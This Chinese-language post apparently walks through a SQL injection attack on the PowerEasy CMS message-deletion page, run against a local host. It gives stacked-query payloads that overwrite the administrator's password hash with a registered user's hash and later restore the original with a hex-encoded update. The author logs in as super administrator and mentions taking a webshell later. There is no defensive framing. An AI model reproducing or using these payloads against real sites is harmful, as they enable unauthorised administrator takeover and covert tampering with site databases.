先注冊個號，進(jìn)入控制面版給自己發(fā)條短信  

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  
這就是點(diǎn)```  
用戶名為admin  奇怪``抓不到```好了抓到了~~~顯示記錄不存在``是因為  
=沒有登陸````ef0020cf8c5e45b9 密碼是這個```  
下面就開始將管理員的密碼更新為我注冊用戶的密碼````  
利用動易爆庫改庫程序先將pe_admin里adminname，password字段爆出來.....  
);update pe_admin set password=(select userpassword from pe_user 
 where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b) 
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--  
這語句的意思就是將PE——ADMIN表中ID=1的用戶的密碼更新為PE_USER表中 user的密碼```好``現(xiàn)在來看```需要將hack520轉(zhuǎn)char  
更新成功`~~~~現(xiàn)在已經(jīng)將PE_admin表ID=1的用戶的密碼更新為hack520的密碼````再看一下```  
53dc3b60f2d40cd4這個是我前面注冊的密碼```好現(xiàn)在登陸后臺看看  
您的用戶名：admin   
您的身份：超級管理員   
待閱短信： 1 條   
成功````然后為自己加個管理員`然后利用以下語句`將管理員的密碼更新回來  
user  
就是注冊的用戶名````````時間不多```進(jìn)得了后臺就不管其他的先了````拿WEBSHELL以后再說```  
剛剛時間到了，現(xiàn)在繼續(xù)。。。將管理員密碼改回來.  
);declare @a sysname select @a=0x650066003000300032003000630066 
0038006300350065003400350062003900 update pe_admin set passwo 
rd=@a--  這個要轉(zhuǎn)一下  

更新```把管理員密碼改回來  OK我們再看看修改成功沒```ef0020cf8c5e45b9這個是原來的密碼吧？  
好了就到此結(jié)束！ 

最新評論